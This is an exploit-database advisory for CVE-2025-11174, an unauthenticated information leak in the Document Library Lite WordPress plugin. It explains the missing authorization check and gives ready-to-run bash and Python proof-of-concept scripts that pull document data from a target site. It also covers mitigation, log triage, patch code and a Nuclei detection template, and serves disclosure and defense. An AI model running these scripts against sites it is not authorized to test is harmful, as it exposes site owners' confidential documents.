## https://sploitus.com/exploit?id=56B8B940-87B7-55B9-8B2C-55731E2FC55A
# CVE-2025-11174: Unauthenticated Information Disclosure in WordPress Document Library Lite
## Overview
**CVE ID:** CVE-2025-11174
**Severity:** Moderate
**CVSS Score:** TBD
**Published:** November 1, 2025
**Vendor:** Barn2 Plugins
**Product:** Document Library Lite (WordPress Plugin)
**Affected Versions:** All versions up to and including 1.1.6
**Fixed Version:** 1.1.7+
## Vulnerability Description
The Document Library Lite plugin for WordPress is vulnerable to **Improper Authorization** leading to **Unauthenticated Information Disclosure**. The vulnerability exists due to the plugin exposing an unauthenticated AJAX action `dll_load_posts` which returns a JSON table of document data without performing proper nonce or capability checks.
This allows any unauthenticated attacker to retrieve sensitive document information that should be restricted to authenticated users with appropriate permissions.
## Vulnerability Type
- CWE-862: Missing Authorization
- CWE-285: Improper Authorization
## Impact
An unauthenticated attacker can:
- Access sensitive document metadata
- Retrieve document listings without authentication
- Enumerate documents stored in the Document Library
- Potentially access confidential document information
### Attack Vector
- **Attack Vector (AV):** Network
- **Attack Complexity (AC):** Low
- **Privileges Required (PR):** None
- **User Interaction (UI):** None
- **Scope (S):** Unchanged
- **Confidentiality Impact (C):** High
- **Integrity Impact (I):** None
- **Availability Impact (A):** None
## Technical Details
### Vulnerable Endpoint
```
POST /wp-admin/admin-ajax.php
action=dll_load_posts
```
### Vulnerability Root Cause
The AJAX action `dll_load_posts` is registered without proper authentication or authorization checks:
```php
// Vulnerable code pattern (simplified)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');
```
The `wp_ajax_nopriv_` prefix indicates this action is accessible to non-authenticated users, and the callback function does not implement:
- Nonce verification
- Capability checks
- User authentication validation
## Proof of Concept
⚠️ **For Educational Purposes Only**
```bash
#!/bin/bash
# CVE-2025-11174 PoC
# Usage: ./exploit.sh <target_url>
TARGET_URL="$1"
if [ -z "$TARGET_URL" ]; then
    echo "Usage: $0 <target_url>"
    echo "Example: $0 https://example.com"
    exit 1
fi
echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
echo "[*] Target: $TARGET_URL"
echo ""
# Send request to vulnerable AJAX endpoint
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
    -H "Content-Type: application/x-www-form-urlencoded" \
    -d "action=dll_load_posts" \
    | python3 -m json.tool
echo ""
echo "[+] If you see document data above, the site is vulnerable!"
```
### Python PoC
```python
#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite Information Disclosure PoC
For educational and authorized testing purposes only
"""
import requests
import sys
import json


def exploit(target_url):
    """
    Exploit CVE-2025-11174 vulnerability
    """
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    print("[*] CVE-2025-11174 - Document Library Lite PoC")
    print(f"[*] Target: {target_url}")
    print(f"[*] AJAX Endpoint: {ajax_url}\n")
    data = {
        'action': 'dll_load_posts'
    }
    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        if response.status_code == 200:
            print("[+] Request successful!\n")
            try:
                json_data = response.json()
                print("[+] Retrieved document data:")
                print(json.dumps(json_data, indent=2))
                print("\n[!] Site is VULNERABLE to CVE-2025-11174")
            except json.JSONDecodeError:
                print("[-] No JSON response received")
                print(f"Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except requests.RequestException as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        print(f"Example: {sys.argv[0]} https://example.com")
        sys.exit(1)
    target = sys.argv[1]
    exploit(target)
```
## Mitigation
### For Site Administrators
1. **Update Immediately:** Upgrade Document Library Lite to version 1.1.7 or later
2. **Check Logs:** Review access logs for suspicious POST requests to `admin-ajax.php` with `action=dll_load_posts`
3. **Verify Installation:** Confirm the plugin is updated by checking the installed version in the WordPress admin panel
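For the log review in step 2, the following triage script is an added example and not part of the original advisory. It assumes the web server writes Combined Log Format, which does not record POST bodies, so the action name is only visible when it is carried in the query string; POSTs to `admin-ajax.php` without a Referer are reported as leads to check against WAF or audit logs, which is a heuristic and not proof. The function name, the heuristic and the sample lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status bytes "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)
AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "dll_load_posts"

def triage(lines):
    """Return {ip: {"confirmed": n, "review": n}} for admin-ajax.php requests.

    confirmed: action=dll_load_posts is visible in the query string.
    review:    POST with no Referer; any action name is in the unlogged body,
               so this is only a lead (assumed heuristic, not proof).
    """
    hits = defaultdict(lambda: {"confirmed": 0, "review": 0})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["target"])
        if url.path != AJAX_PATH:
            continue
        if ACTION in parse_qs(url.query).get("action", []):
            hits[m["ip"]]["confirmed"] += 1
        elif m["method"] == "POST" and m["referer"] in ("", "-"):
            hits[m["ip"]]["review"] += 1
    return dict(hits)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Nov/2025:10:15:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 5120 "-" "curl/8.5.0"',
    '203.0.113.7 - - [02/Nov/2025:10:15:09 +0000] "GET /wp-admin/admin-ajax.php?action=dll_load_posts HTTP/1.1" 200 5120 "-" "curl/8.5.0"',
    '198.51.100.20 - - [02/Nov/2025:10:16:30 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 312 "https://example.com/documents/" "Mozilla/5.0"',
    '198.51.100.20 - - [02/Nov/2025:10:16:45 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "https://example.com/" "Mozilla/5.0"',
    '192.0.2.44 - - [02/Nov/2025:10:17:02 +0000] "GET /documents/ HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, counts in triage(SAMPLE_LOG).items():
        print(ip, counts)
```

To see the action name for POST requests as well, the body has to be captured elsewhere, for example in WAF or application audit logging.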
### Update Command (WP-CLI)
```bash
wp plugin update document-library-lite
```
### For Plugin Developers
The vulnerability can be fixed by:
1. Adding nonce verification:
```php
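// Reject the request when the nonce is missing or invalid
if (!isset($_POST['nonce']) || !wp_verify_nonce(sanitize_text_field(wp_unslash($_POST['nonce'])), 'dll_nonce')) {
    wp_die('Invalid nonce');
}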
```
2. Adding capability checks:
```php
if (!current_user_can('read')) {
    wp_send_json_error('Insufficient permissions');
    wp_die();
}
```
3. Removing the `wp_ajax_nopriv_` hook or adding proper authentication
## Detection
### WordPress Plugin Check
```bash
# Check if vulnerable version is installed
wp plugin list | grep -i "document-library-lite"
```
### Security Scanner Rules
**Nuclei Template:**
```yaml
id: CVE-2025-11174
info:
  name: Document Library Lite - Unauthenticated Information Disclosure
  author: security-researcher
  severity: medium
  description: Document Library Lite plugin for WordPress is vulnerable to information disclosure
  reference:
    - https://github.com/[your-repo]/CVE-2025-11174
  tags: cve,cve2025,wordpress,wp-plugin,unauth
requests:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php"
    # Form encoding is required for PHP to parse the body into $_POST
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "action=dll_load_posts"
    matchers:
      - type: word
        words:
          - "data"
          - "recordsTotal"
        condition: and
```
## Timeline
- **November 1, 2025** - CVE-2025-11174 published
- **November 1, 2025** - Vendor notified
- **November 2025** - Patch released (version 1.1.7)
## References
- [CVE-2025-11174 - CVE.org](https://vulners.com/cve/CVE-2025-11174)
- [GitHub Advisory Database](https://github.com/advisories/GHSA-cq4p-v24g-p55q)
- [Wordfence Intelligence](https://www.wordfence.com/threat-intel/vulnerabilities/id/2b73d48a-1f10-4e47-a18f-82a3103b72bd?source=cve)
- [WordPress Plugin Directory](https://wordpress.org/plugins/document-library-lite/)
## Credits
- Avraham Shemesh
- Kai Aizen [(SnailSploit)](Https://snailsploit.com)
## Disclaimer
This repository is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing any system.
## License
MIT License - See LICENSE file for details
---
**Note:** This vulnerability affects a specific WordPress plugin. Site administrators should update immediately to protect their installations.